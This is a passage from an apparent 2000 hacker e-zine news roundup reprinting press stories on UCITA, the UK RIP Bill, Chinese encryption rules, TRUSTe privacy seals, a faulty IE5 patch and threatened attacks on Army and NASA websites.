The US Department of Justice has officially launched a cybercrime web site defining computer crime and describing how to report it. The site also includes the department's latest thinking on privacy vs. policing on the Internet as well as computer search and seizure guidelines.

Associated Press - via Nando Times
http://www.techserver.com/noframes/story/0,2294,500180192-500237416-501173875-0,00.html

(Sorry dead link ... -Ed :( )

Cybercrime.gov
http://www.cybercrime.gov/

@HWA

21.0 HNN:Mar 14th: China Relaxes Crypto Rules
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN
http://www.hackernews.com/

contributed by acoplayse

After pressure from the US-China Business Council, Chinese authorities have agreed to "clarify" encryption regulations that were published in October last year. The State Encryption Management Commission (SEMC), which reports to the Ministry of State Security, has said that only hardware or software for which encryption is a core function will be limited by the regulations. Products that contain encryption as a secondary function will no longer be restricted. This includes browsers, consumer electronics and other items.

Financial Times
http://news.ft.com/ft/gx.cgi/ftc?pagename=View&c=Article&cid=FT3ZAN1CS5C&
live=true&useoverridetemplate=ZZZFKOXOA0C&tagid=ZZZC00L1B0C&subheading=
information%20technology&_ref=526610871

China softens rules on encryption

By James Kynge - 13 Mar 2000 22:06GMT

China has backed away from sweeping restrictions on the use and sale of foreign encryption technology that would have wreaked havoc on the use of foreign software, mobile phones, e-mail and other communications applications.

The US-China Business Council, which led a lobbying effort that united several national chambers of commerce in Beijing, said on Monday that Chinese authorities had agreed to "clarify" encryption regulations published in October last year.

The main sense of the clarification was that only hardware or software for which encryption is a core function will be limited by the regulations of the State Encryption Management Commission (SEMC), a body that reports to China's intelligence agency, the Ministry of State Security.

This means that mobile phone handsets, Windows software, browser software and other applications that contain encryption as an ancillary function will not now be restricted.
Windows 2000, Microsoft Corp's newest operating system, which is set to be launched in China on March 20, was given approval for sale this month by authorities, prefiguring the relaxation in SEMC's rules.

It was not immediately clear what types of products would fall under the definition of having encryption as a core function.

Under the SEMC's original restrictions, all businesses and individuals would have had to register with the government any products containing encryption technology. They then would have had to apply for permission to use the goods.

But a clarification letter issued by the SEMC allayed fears the government would gain access to corporate secrets carried in encoded communications by requiring companies to hand over their encryption source codes.

Business travellers carrying laptops with ordinary software, even if it contains some encryption capabilities, are not required to register, the US-China Business Council quoted the SEMC as saying in a verbal clarification of the regulations.

@HWA

22.0 HNN:Mar 14th:Stallman on UCITA
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN
http://www.hackernews.com/

contributed by Weld Pond

The Uniform Computer Information Transaction Act will threaten the existence of free software if passed. Richard Stallman, the founder of the Free Software Foundation, has spoken out vehemently about this legislation and continues to do so.

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2457092,00.html

Interview: GNU guru Richard Stallman
The president of the Free Software Foundation and founder of the free-software movement speaks out against UCITA.

By Robert Lemos, ZDNet News
March 12, 2000 3:44 PM PT

When Richard Stallman founded the GNU (or Gnu's Not Unix) Project in 1984, his aim was to create Unix-compatible tools that were free. Sixteen years later, GNU software is a critical part of most Unix systems and forms the basis -- along with Linus Torvalds' Linux kernel -- of all Linux systems.

With the proposed Uniform Computer Information Transaction Act (UCITA) threatening the free-software movement, ZDNet News Senior Editor Robert Lemos caught up with Stallman, president of the Free Software Foundation, in India.

ZDNet: What will be the effect of UCITA on the free software movement?

Stallman: UCITA would make it harder for us to avoid liability for bugs that turn up in the free software we develop -- while giving proprietary software developers a very easy way to avoid all liability for their products, even for faults that they know about in advance. This is grossly unfair.

UCITA would also give proprietary software developers a way to prohibit reverse engineering. They could then promulgate secret formats for distributing and storing data and stop us from implementing free software to handle those formats. We would be unable to provide you with software to access your own data.

ZDNet: What will be the effect on GNU development? What about GNU/Linux?

Stallman: I don't expect UCITA to have any immediate effect on our software development. But in the long term we will probably have trouble making our software handle the secret data formats and support new hardware whose specifications are secret. Microsoft already said they plan to use secret formats and protocols to block the development of (GNU/) Linux. The format of Word is already a secret, and it is only through reverse engineering that people can figure out anything about it.

ZDNet: Will software be worse because of UCITA?

Stallman: That is the wrong question. The right question is how will users of software be worse off because of UCITA? I've already explained the problems free software will face. We will face additional obstacles to doing a good job. For non-free software, developers will not face additional obstacles, but they will be able to restrict the users in onerous ways. So even if the software is unchanged, the users will be worse off.

For example, the owners will be able to change the software license at any time, restricting what you are allowed to do with a program. They will be able to send you e-mail containing new conditions, and these new conditions will be legally binding on you even if you never actually got the mail. If you do see the mail and you reject the new conditions, they will be able to demand that you stop using the program -- and even send your machine a message across the network to turn off the program without a moment's notice.

ZDNet: If there is so much opposition, why has the BSA, and others, had so much success in pushing the bill through?

Stallman: As far as I know, they have succeeded in one state. The term "so much success" seems to be an exaggeration. I don't know why they succeeded in Virginia; I can only guess. But here are some things, which are not unusual, which may have happened this time:

1. The supporters of UCITA probably are better organized and have more money to contribute to election campaigns.

2. The legislators probably have not actually read UCITA, and that enabled supporters of UCITA to mislead them about both what UCITA would do and why people oppose it.

3. The supporters of UCITA probably told the legislators ... that if Virginia passes UCITA and other states do not, some software companies will move to Virginia.

State legislators and governors often give an unreasonable amount of emphasis to winning business to their states from other states. They often do this without regard to whether the country as a whole will benefit or suffer as a result. Business often uses this to manipulate states, to play one state against another, to get what it wants.

The joke, though, is on them, because only retail Internet sites would move to Virginia, and the total employment of these sites would be insignificant. The software development will remain where it is, in California, Washington, Bangalore or wherever.
(Sorry about formatting, couldn't be bothered to pretty it up ... - Ed)

@HWA

23.0 HNN:Mar 14th:What Exactly Does TRUSTe Mean Anyway?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN
http://www.hackernews.com/

contributed by Evil Wench

The industry trade group TRUSTe was formed in an effort at self regulation and to help fend off unwanted legislation. Are they really doing the public a service? An interview with TRUSTe CEO Bob Lewin details how even sites selling personal data can acquire the privacy seal of approval.

Salon
http://www.salon.com/tech/view/2000/03/13/truste/index.html

The privacy police?
TRUSTe CEO Bob Lewin explains how even sites selling personal data can get the nonprofit's privacy seal of approval.

- - - - - - - - - - - -

By Lydia Lee

March 13, 2000 | When TRUSTe launched in 1996, the nonprofit promised to help the Internet industry regulate itself with regard to protecting surfers' privacy. Over the past three years, it has vetted the privacy policies of over 1,300 sites, and its black-and-green logo, which signals to visitors that a site actually abides by its policies, can be found on most major e-commerce sites.

But what kind of teeth does the organization really have? TRUSTe didn't look so trusty last year when a security expert found that its licensee RealNetworks had been collecting user information on the sly. Instead of reprimanding the company, the nonprofit argued that because RealNetworks' privacy violations took place via its RealJukebox software, not its Web site, the incident was outside the purview of TRUSTe. More recently, it's been other privacy advocacy groups like JunkBusters that have alerted the public to privacy violations such as Intel's decision to include an identifier in its Pentium III chip; JunkBusters also started a campaign against DoubleClick's acquisition of Abacus when it was announced last June.

But Bob Lewin, executive director and CEO of TRUSTe, says the group's privacy seal program plays an important role in enforcing privacy policies. Previously, Lewin was vice president of marketing at networking software company ISOCOR and before that at the open systems consortium X/Open Company. Now he heads up this nonprofit that charges between $300 and $4,999 to certify an e-commerce site's privacy practices.

What's the basic message you're giving to consumers when they see the TRUSTe symbol? Is it that the site isn't going to sell my data?

The bottom line is that this site adheres to the fair information practices -- that they are disclosing what information they're collecting, why and if they're sharing that information with somebody. No 2: that they're giving the visitor the choice -- whether to allow that to happen; 3) that once the information is collected, they will use reasonable security to protect that information; 4) that they allow the consumer reasonable access to that information to modify it.

So if I were collecting consumers' e-mail addresses and then selling them to a direct-marketing company, would I still be able to get the TRUSTe symbol?

Only if you stated that to the consumer in your privacy statement. If somebody came to us and said, "Here's our privacy statement. We will collect the e-mail addresses, and it's our intent to sell or share this information with these third parties, and we are giving you the option to say yes or no to this." Then that site could become a TRUSTe licensee.

What percentage of sites get rejected?

It's not a large percentage -- I'd guess 1 to 2 percent.

What's the major reason sites get rejected?

Once they start through the process, they can't or will not meet the requirements of the program. Say they'd like to be able to share info with a subsidiary, and we say, "That's to a third party, you have to disclose that." Well, they may voluntarily decide they're not going to proceed.

Also, we don't apply our mark to gambling sites, since it's illegal in some states. The other reason that it happens, frankly, is that 85 percent of our sites are very small -- $10 million and below -- and as the process starts, the company goes out of business.

If DoubleClick had been a TRUSTe member, would its decision to combine its database of anonymous surfing habits with an acquired database of personal information have set off red flags for you?

There would be some issues. That's why we formed a third-party ad server committee, to get all the technical and legal issues out on the table. They would have had to inform us before they changed their policy, and we would have had some discussions.

Once it has the TRUSTe seal, have you ever kicked out a site for doing something?

No, we've come very close, but we haven't had to do it. The escalation process is as follows: We get a complaint from a consumer about a licensee, and once we are assured that the consumer had previously contacted the Web site to try and get it resolved -- because a lot of these are just misunderstandings -- we then contact the Web site and investigate and find out indeed if there's a real issue here. Now, the resolution to this may result in a change in the privacy policy, the business model, or what have you.

Shouldn't you have caught that kind of stuff when you reviewed the policy in the first place?

Well yes, but the nature of the beast is that all of this is software. What is generally the case is that there's been some unplanned feature in the software. Something will happen -- not that somebody wanted to do it, but the software allowed them to do it. So, when it happens, you point it out, it gets fixed and it's over.

But that shouldn't mean they need to change their privacy policy, should it?

It could be just a software change, but it could be a policy change. Let's say you implement software that shares information, or decide to collect more info than you originally stated -- perhaps you're collecting IP addresses, or disseminating cookies. So you have to change your policy. This whole thing is not a static field. We do constant monitoring, but many of our licensees will communicate with us, and in fact one-third of our efforts is focused on working with them. As their Web sites evolve, we've got to ensure that the privacy statement evolves. It's an ongoing process.

Would it be incumbent on the company to notify all the users who had seen the previous privacy policy?

If they start collecting new information, then at that point in time, they have to communicate to users from this point forward, "We are also doing this." So that has to be stated clearly in the privacy statement. It would not impact people from beforehand because that information was not being collected.

But what if the people from beforehand come back and then they don't read the privacy policy? Is there anything in the TRUSTe program that says if you are instituting a new privacy policy, you have to let all the consumers from before know that?

Well, we can't force consumers to read privacy statements, but in all our consumer outreach programs, we tell people: Even if you've visited this site before -- because things change -- the first thing to do is go to the privacy statement and review it to make sure there have been no changes. And we encourage licensees to put any changes up at the front. This is easier said than done -- none of us like to read pages and pages of text.

Have you ever blown the whistle on a company?

Yes, there are instances -- most of the problems are not with malice aforethought. The major monitoring is by consumers themselves, but we have people who look at the sites every quarter, to see if there've been any changes on the site. We also enter in names that we make up, opt-in in some cases and opt-out in others, so if we get communication to a name then we know where it came from.

What role should the government have in enforcing online privacy?

They play a very important role now, because they conduct studies on whether improvement has occurred within the industry -- the number of privacy statements, the quality of privacy statements. I think the government has clearly stated that certainly in the health-care and financial area, they feel the need to have some kind of legislation. They also did that for children -- the Children's Online Privacy Protection Act. They've said that because this is super-sensitive information, you should have some guidelines. Now, the question becomes, what vehicle do you use to enforce that legislation, which is equally important. We feel that seal programs -- and in particular, TRUSTe -- play a very important part there. COPPA is going into law April 21, and our contract will contain the elements for Web sites to adhere to COPPA requirements.

But it seems like a lot for any one company to keep up with. With all these violations going on, it seems like there needs to be a more watchful eye.

I would say that there is a watchful eye, if people look at the facts versus hype from some advocacy groups. It's all very well to run around screaming and yelling, "The sky is falling, the sky is falling," but the fact is, many of these issues that have come up are evolutions that occur in business models on the site. I would argue that the industry has demonstrated very quick response when those problems come up. Take RealNetworks. The issue there occurred outside the scope of the current TRUSTe program. Yes, Real Networks is a TRUSTe licensee, but this particular issue had nothing to do with the collection of personal information on the Web site; it had to do with the collection of user information using software servers. Now, within a week, even though it was outside the program, we announced the formation of a pilot to evolve our program to handle those situations. I defy any government agency to do that.

But customers aren't thinking, when they see the TRUSTe symbol, that it only covers the Web site. Maybe from the technical view it's different, but the consumer isn't going to make the distinction. Does the TRUSTe program cover both now?

Yes, we need to do a better job so the consumer intuitively knows what the TRUSTe logo stands for. Ultimately, it would be great -- as we lay out the software privacy program -- to blend the two programs together. Or there may be a TRUSTe symbol for sites and one for software.

What privacy issues are you trying to anticipate?

One thing we're looking at is the wireless world, where we start talking about palm-held things and hand-held things and phones. I think there are some issues there we haven't fully addressed yet. We need to add more meat to the term "reasonable security." Today, that's the best term people have, because it can vary so much depending on the application and the technology. As we put more and more of these things into people's hands, we have to worry about how we prove that the person holding it is indeed the proper owner.

salon.com | March 13, 2000

- - - - - - - - - - - -

About the writer
Lydia Lee is an associate editor for Salon Technology.

@HWA

24.0 HNN:Mar 15th:UCITA Signed By Governor in Virginia
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN
http://www.hackernews.com/

contributed by techs

Set to take effect in July 2001, the Uniform Computer Information Transaction Act has been signed into law in Virginia by Governor James S. Gilmore III. UCITA will allow software companies to remotely disable software and will give licensing agreements the force of law.
Washington Post
http://www.washingtonpost.com/wp-dyn/articles/A6866-2000Mar14.html

Computer World
http://www.computerworld.com/home/print.nsf/all/000314F772

Post;

Gilmore Signs 1st Internet Commercial Code Into Law

By Craig Timberg
Washington Post Staff Writer
Tuesday, March 14, 2000; 1:00 PM

Virginia Gov. James S. Gilmore III signed the nation's first set of contractual rules specifically governing electronic commerce into law today on the second day of an Internet summit at George Mason University.

The Uniform Computer Information Transaction Act, which is typically called by its initials "UCITA," overwhelmingly passed the General Assembly during the just-finished legislative session despite the opposition of critics who contended it would erode basic consumer rights. Because of that continuing debate, the law will not take effect until July 2001 while lawmakers study the fine print.

Supporters such as Gilmore (R) say UCITA mainly updates for the Information Age the commercial codes that states passed decades ago. UCITA essentially gives the force of law to software licensing agreements as soon as a consumer rips the shrink-wrap off the box or hits the "I Accept" button on a program downloaded from the Internet.

"UCITA provides clarity to contract law where none existed before, which will make it easier for consumers and industries to conduct transactions via the Internet," Gilmore said in a statement. "This increase in electronic transactions will perpetuate the Internet revolution, promote e-commerce and foster the growth of Virginia's technology and manufacturing economies."

State officials hope that by becoming the first state to adopt UCITA, Virginia will further its reputation as a center of high-technology and attract more businesses to the state.

But consumer advocates warn that in the rush to adopt UCITA, Virginia overlooked concerns that have caused two dozen attorneys general around the country, including Maryland's J. Joseph Curran Jr. (D), to write a letter voicing concerns. Consumer groups warn that UCITA will give software companies new power to disable or "repossess" their products if they believe they are being used in a way that violates the licensing agreement.

Another worry, say consumer advocates, is that buyers won't always know the details of the licensing agreements until after the purchase is made.

"The whole idea of informed shopping is based on disclosure before purchase," said Jean Ann Fox of the Virginia Citizens Consumer Council, which lobbied against the bill.

The signing took place at The 2000 Global Internet Summit at George Mason's campus in Fairfax.

(c) 2000 The Washington Post Company

-=-

Computer World;

Va. governor signs UCITA legislation into law

By Patrick Thibodeau
03/14/2000

Fairfax, Va. — Flanked by the chairman of one of the state's largest businesses — America Online Inc.'s Steve Case — Virginia Gov. James Gilmore today signed the Uniform Computer Information Transactions Act (UCITA) into law.

But the bill won't take effect until July 2001, giving people and businesses with concerns about UCITA time to seek legislative amendments, the governor said.

"We're not deaf to people's concerns," said Gilmore. Still, Gilmore said he doesn't believe those concerns were "legitimate impediments" to the state's adoption of the legislation.

The year-delay for adoption came at the behest of a coalition of some of the state's largest nontechnology companies, who believe UCITA gives software vendors the upper hand in software licensing (see story).

"If there's any sense that things may not be quite right, there is plenty of time for people to come in under Virginia's approach and have a chance to do some amendments," said Gilmore.

The state plans to create a study committee to examine the issues raised by the business coalition that sought to delay the law's implementation.

UCITA sets a series of default rules governing commercial software transactions. One of its most controversial provisions would allow a software vendor to automatically disable software in a contract dispute.

Case praised Virginia's action and said he hoped "other states will look at this and learn from this and embrace it."

Virginia is moving quickly on UCITA to help create an attractive climate for its technology businesses. For UCITA to become the law of the land, technically it must be adopted by 50 states. But companies may nonetheless cite UCITA in their license agreements.

"If Virginia remains the only state that adopts this, then I believe that the certainty of our (actions) would attract additional businesses into the commonwealth," said Gilmore.

Maryland is also actively considering the legislation.

@HWA

25.0 HNN:Mar 15th:RIP Goes Before Commons Today
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Lady Sharrow

The UK Government's Regulatory Investigatory Powers (RIP) Bill goes before Select Committee in the House of Commons today and in a little more than six months it could be enshrined in law. The bill will force ISPs to have the facilities to log and monitor all online activities of their users.

The Register UK
http://www.theregister.co.uk/000314-000016.html

Posted 14/03/2000 11:37am by Sean Fleming

What the hell is... the UK's RIP Bill

The UK Government's Regulatory Investigatory Powers (RIP) Bill goes before Select Committee in the House of Commons today and in a little more than six months it could be enshrined in law.

But with 30 amendments tabled against it and an angry mob of opponents waiting to string it up, RIP has become better known for the widespread - and some might say kneejerk - reaction people have had to it, rather than for its aims and content.

Civil liberties groups, individual Net users and politicians from all the major UK parties are banding together to decry what is being labelled a Snoopers Charter. But just what is all the fuss about?
The Blair administration has been slammed by many for its cronyism and control freakery, so is this just another example of Big Brother Blair wanting to watch over you at all times?

Growing pains

To become an accepted part of everyday life, and not just the place to go for cyberporn, e-fraud and to pick up your email, the Internet will have to appeal to a broader cross-section of the general public. Ecommerce, for example, will never thrive in a world where the majority of potential users and customers are too scared to part with their credit card details in case they get ripped off. The not-so-wired public need to feel confident about the Internet.

This is all part of the natural evolution that all things go through when they achieve popularity. The days of the WWW Wild West are numbered.

So, what does the Bill propose and why are so many people objecting to it?

The Bill describes itself as: "A Bill to make provision for and about the interception of communications, the acquisition and disclosure of data relating to communications, the carrying out of surveillance, the use of covert human intelligence sources and the acquisition of the means by which electronic data protected by encryption or passwords may be decrypted or accessed; to provide for the establishment of a tribunal with jurisdiction in relation to those matters, to entries on and interferences with property or with wireless telegraphy and to the carrying out of their functions by the Security Service, the Secret Intelligence Service and the Government Communications Headquarters; and for connected purposes."

Lots of spooky terms in there - "covert human intelligence sources" translates as spies - but in essence this is all about setting down a legal framework within which electronic communications are treated no differently from telephone tapping and intercepting mail (as in the paper stuff). Some people will throw their hands in the air at the very thought of any of this but cracking down on the illegal use of the Internet by terrorists, perverts and organised criminals may be considered by many to be A Good Thing.

One size fits all

However, the Bill falls down - and in a big way - in the details. Or lack of them. It is vague on practicalities, and how permission to access private communication will be granted.

ISPs will be obliged by law to have the facilities to log and monitor all the online activities of their users. But the Bill doesn't specify how this will be done. And while there is talk of the Government reimbursing hardware costs with regard to monitoring, it doesn't make provision for the massive increase in overheads this will bring.

The Bill is also very vague in parts and can be interpreted in such a way that much of it becomes nonsensical. For example, it defines who will be covered by the Bill when it becomes law:

"a person who provides a postal service, or b) a person who provides a public telecommunications service, or c) a person not falling within paragraph b) who has control of the whole or any part of a telecommunications system located wholly or partly in the UK."

ISPs, mobile phone companies, WAP service providers, news servers and so on all fall under the term "telecommunications service". Look at that definition again - it could mean anyone.

One of the Bill's fiercest critics is the organisation Stand. This is what Stand has to say on this point: "You're no longer using an ISP to connect to the Net. You're using the ISP's public telecommunication system."

The Bill also makes it an offence for you to be told that a surveillance warrant has ever been issued against you. That offence exists in perpetuity - there is no expiry date, you can never be told. And should anyone ever tell you they risk a prison sentence.

Someone to watch over me

Ah yes, you may be thinking, I live in a liberal democracy - the security forces can't just go round snooping on people willy nilly. Well, guess again. Here's what the Bill says about surveillance warrants. There are four main justifications given by the bill for issuing a warrant:

a) national security interests,
b) to prevent or detect serious crime,
c) to safeguard the UK's economic well being
d) for the purpose, in circumstances appearing to the Secretary of State to be equivalent to those in which he would issue a warrant by virtue of paragraph (b), of giving effect to the provisions of any international mutual assistance agreement.

And there's a list as long as your arm of those people who can issue the warrant against you - from senior police officers to "any such other persons as the Secretary of State may by order designate".

Reading between the lines, the Bill says that the Home Secretary can - for any reason - issue a warrant against anyone, and that anyone with the Home Secretary's permission can do likewise. Don't forget, you'll never know if information has been gathered about you, what it was used for and so on.

Taking Liberties

As it stands, reader Simon Batistoni writes, the RIP Bill contains one truly frightening basic assumption: if you have stored on your computer any form of encrypted message, you will be forced on request by the police to hand over the necessary keys to decrypt this data. If you do not have the keys, YOU MUST PROVE THAT YOU HAVE NEVER BEEN IN POSSESSION OF THEM, or you could be subject to a two-year jail term.

The principle of the police being able to view encrypted data, so that they can nail paedophiles, drug dealers, etc, has some genuine merits. The flaw in this measure, however, is that the recipient/possessor of encrypted data is guilty, until proven innocent, something which destroys the entire foundation of our legal system. What's more, it is impossible to prove that you never had something.

As it stands, the measures in the Bill could be applied to a PGP-encrypted signature on an email, currently used by many as a reliable means of identity verification. Theoretically, the innocent father of a suspect under surveillance, who receives an email from his son containing the standard encrypted signature, could fall under the scope of this RIP Bill; he could be jailed for failing to reveal the contents of the encrypted data.

Ostriches need not apply

Small wonder that there is so much opposition to the Bill. There are many more examples of the above thinking running throughout the Bill, such as the loophole that could mean you have to keep tabs on yourself but can never let yourself know, otherwise you end up in prison.

Stand has done a much more comprehensive job of examining RIP than The Register is able to do and its site is well worth a visit.

Don't be fooled into thinking that your Government will always have your best interests at heart, because that's not the way of Governments. But at the same time, don't assume that any attempt to regulate the Internet is an invasion of rights and freedoms - freedom without responsibility is, after all, little more than latent tyranny.

We will all be affected by the RIP Bill when it becomes law - as it almost certainly will, in some form or another - so now is the time to find out a little more about it and decide where you stand, because in another six months it could all be too late. ®

@HWA

26.0 HNN:Mar 15th:Security Patch Locks Out Users
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by acopalyse

A 128-bit security patch for Internet Explorer 5.0, 5.0a, and 5.0b released by Microsoft will replace security files with older versions that will lock users out of their systems after restart. Microsoft has asked administrators to stop distributing the patch and has said that a fix will be available soon.
InfoWorld
http://www.infoworld.com/articles/en/xml/00/03/14/000314enpatch.xml

IE5/Windows 2000 security patch can lock out users

By Cynthia Morgan, Computerworld

MICROSOFT WARNED NETWORK administrators on Monday to stop distributing a security patch for Internet Explorer 5.0 that could prevent Windows 2000 users from logging in to their computers.

Instructions included with the patch, a 128-bit security add-on for Internet Explorer 5.0, 5.0a, and 5.0b versions, are incorrect, said a Microsoft spokesman. The error, a command-line "switch," causes an automated installation to replace security files with older versions that will lock users out of their systems after restart. The 128-bit security installations under Windows 9x and Windows NT 4.x are not affected, the spokesman added.

Administrators who have built automated installation packages for Internet Explorer 5.0 on Windows 2000 systems should check the Microsoft site for information on correcting the problem. Meanwhile, installation packages containing the faulty switch should be frozen immediately.

A Microsoft KnowledgeBase bulletin (#Q255669) with complete instructions and updates should be available at search.support.microsoft.com/kb within 24 hours, the spokesman said.

Microsoft Corp., in Redmond, Wash., is at www.microsoft.com

For more enterprise computing news, go to www.computerworld.com.

Copyright (C) 2000 Computerworld, Inc. All rights reserved.

@HWA

27.0 HNN:Mar 15th:DNA Used for Steganography
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Dan

17-year-old Romanian-born Viviana Risca topped the 59th Intel Science Talent Search competition by embedding a computer message in the gene sequence of a strand of DNA using steganography, a data encryption technology that allows a computer user to hide a file within another file.

San Jose Mercury News
http://www.sjmercury.com/svtech/news/breaking/merc/docs/013955.htm

Posted at 7:51 a.m. PST Tuesday, March 14, 2000

New York teen-ager wins $100,000 with encryption research

WASHINGTON (AP) -- A 17-year-old Romanian-born girl who embedded a computer message in the gene sequence of a strand of DNA has been named the best young scientist in the country.

Viviana Risca, a senior at Paul D. Schreiber High School in Port Washington, N.Y., won a $100,000 college scholarship when she bested 10 other high school seniors on Monday in the 59th Intel Science Talent Search competition.

Risca said her project in steganography, a data encryption technology that allows a computer user to hide a file within another file, was a simple one. Risca, who emigrated from Romania eight years ago, embedded the secret message ``June 6 Invasion: Normandy.''

Technologies like steganography can protect sensitive electronic information from interception or eavesdropping, but they can also wreak havoc if used by terrorists and criminals.

Formerly known as the Westinghouse Science Talent Search, the contest has been nicknamed the ``Junior Nobel Prize.'' Past winners include five Nobel laureates, nine MacArthur Foundation fellows and two Fields medalists. Forty finalists came here to compete for the award.

Jayce Getz, a senior at Big Sky High School in Missoula, Mont., won second prize and a $75,000 scholarship for a math project on partition function. And Feng Zhang, a senior at Theodore Roosevelt High School in Des Moines, Iowa, won third prize and a $50,000 scholarship for a biochemistry project in molecular virology.

The other winners in the top 10, their schools, the amounts of their scholarships and their projects were: Alexander Schwartz, Radnor (Pa.) High School, $25,000, abstract algebra concerning Abelian groups; Eugene Simuni, 18, Midwood High School in Brooklyn, N.Y., $25,000, a biochemistry project that investigated G proteins; Matthew Reece, duPont Manual Magnet High School, Louisville, Ky., $25,000, a proposal on fluid dynamics problems; Kerry Ann Geiler, 17, Massapequa (N.Y.) High School, $20,000 for a project on communication by ants; Elizabeth Williams, Palos Verdes Peninsula High School, Rolling Hills Estates, Calif., $20,000, perception of light and shape by the brain; Zachary Cohn, 17, Half Hollow Hills East High School in Dix Hills, N.Y., $20,000 for a study of perfect squares; Bob Cherng, Troy High School, Fullerton, Calif., $20,000, the transition of ammonia and hydrogen halide into ammonium halide.

The other 30 finalists received $5,000 scholarships.

@HWA

28.0 HNN:Mar 15th:Bugging SAT Phones
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Odin

A lot of people have turned to satellite phones as a last ditch effort to retain some privacy. Now Motorola has patented a means by which to listen in to a satellite phone to satellite phone call.

New Scientist
http://www.newscientist.com/news/news_222923.html (sorry: 404! - Ed)

@HWA

29.0 HNN:Mar 15th:More and more EZines
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by L33t Dawg

New issues of several e-zines have been released including Hack In The Box Issue #3, HWA Haxor news #51 and Datacore has released DataZine 0.02.

Hack In The Box Issue #3
http://www.hackinthebox.org

HWA.hax0r.news
You're here already :-)

DataZine .02
http://www.tdcore.com/index2.html

@HWA

30.0 HNN:Mar 16th:Army on Alert Over CyberAttack Fear
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

The Army has placed all of its worldwide cyber defense teams on full alert after learning of a threat from a group known as The Boys From Brazil.
The group has threatened to deface the army.mil home page. The Army has said that it is aware of the group's attack profile, and is prepared for any attack against the Army's Web site and that they have enacted additional 'countermeasures' to protect the site. (Is there really a threat? Who knows, but this sounds like one hell of a publicity stunt.)

Federal Computer Week
http://www.fcw.com/fcw/articles/2000/0313/web-armyhac-03-15-00.asp

Army on hacker alert

BY Dan Verton
Updated 03/16/2000 at 17:05 EST

HOUSTON — The Army has placed its cyberdefense teams on full alert after a known hacker group threatened to take down the Army's World Wide Web home page this Friday.

On Tuesday evening the Army placed its cyberdefenders at the Land Information Warfare center at Fort Belvoir, Va., on full alert after a group known as the Boys from Brazil threatened to hack into the Army home page on Friday. But today the Army clarified that the hacker group it is watching is Hacking for Girliez, which took down the New York Times' site in September 1998.

Most of the hackers' remarks appeared in comment tags, which can be seen in source material but not on a Web page. The tags include such remarks as "'Immature kids' were able to bypass...$25,000 firewalls [and] bypass the security put there."

Philip Loranger, chief of the Command and Control Protect Division in the Army's Information Assurance Office, speaking here at the 2000 Army Directors of Information Management Conference, said the Army is prepared for any attack against its Web site.

"We've had to activate some countermeasures to protect the Army home page," Loranger said, declining to provide specifics for security reasons. However, he said the countermeasures being put in place do not include disconnecting the Army site from the Internet.

Specific details emerged today on some of the steps the Army has taken in the past few months to prepare for these types of attacks. Lt. Col. James Withers, a systems engineering specialist with the Army signal command, said the Army's regional CERTs have written special software scripts that will help defend against known hacker tactics. The Army also developed Web cache proxy servers that divert Web surfers away from primary servers residing behind firewalls on Army installations.

The Army is also in the process of deploying a protected domain name system architecture that will help the service regain control of all Army Internet sites and network entry points. "We know the hackers mapped [the old architecture]," Withers said, adding that 90 percent of the Army's global protected DNS architecture should be completed by April.

Loranger demonstrated for conference attendees how simple it is for hackers to exploit known operating system vulnerabilities using widely available hacker tools and standard systems administrator procedures. In fact, Loranger, with the approval of the Army's staff counsel, demonstrated a live hacking of another computer system to show how within minutes hackers can crack into known password vulnerabilities and take over entire systems and networks.

Loranger also said that the lack of international laws governing conduct on the Internet poses real obstacles to the government's ability to respond to foreign-based hacker attacks. Loranger pointed out that some graduate-level computer education schools in India, for example, have established hacking into U.S. government systems as an academic requirement.

Lt. Col. LeRoy Lundgren, program manager for the Army's National Security Improvement Program, said as many as 285,000 network queries were denied by Army security systems last year because of the questionable method used. Lundgren added that the Army has seen an increase in the number of queries originating in foreign countries, particularly China and Bulgaria.
@HWA

31.0 HNN:Mar 16th:NASA Fears CyberAttack From Brazil
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by William Knowles

NASA's Jet Propulsion Laboratory has blocked all access to its web site from addresses originating in Brazil due to fears of a cyber attack. JPL spokespeople said that access would be restored once additional security measures were in place. (How does blocking one country affect anything?)

Newsbytes
http://www.newsbytes.com/pubNews/00/145708.html

NASA Division Battles The Hack From Ipanema

By Robert MacMillan, Newsbytes
WASHINGTON, DC, U.S.A., 15 Mar 2000, 1:15 PM CST

From Antonio Carlos Jobim to the samba, the US generally has welcomed some of the cooler cultural exports from Brazil, but the latest one - a series of hack attacks on NASA's Jet Propulsion Laboratory at CalTech - has the agency bossa nova-ing its way toward beefing up its security measures.

JPL Spokesman Frank O'Donnell confirmed for Newsbytes an MSNBC report that the agency has shut down access to queries emanating from Brazil until the agency's security team makes some necessary improvements to its network. O'Donnell said that the Brazil shutout was not a "blacklist" attempt, as earlier reports indicated.

"There was a number of recent attacks on JPL hosts originating from various sites in Brazil, and as a temporary move while our computer security people work, we're blocking network access to JPL from Brazil," O'Donnell said. "But this is a temporary thing."

He said normal service to South America's largest nation would return "in a matter of days at most." He added that he is "not aware of any (security) compromises per se in these attacks."

Highly secure data at JPL generally is not stored on hosts that are connected to the Internet, O'Donnell also said, but added that he could "not go into a great deal of detail" on what kind of information was sought.

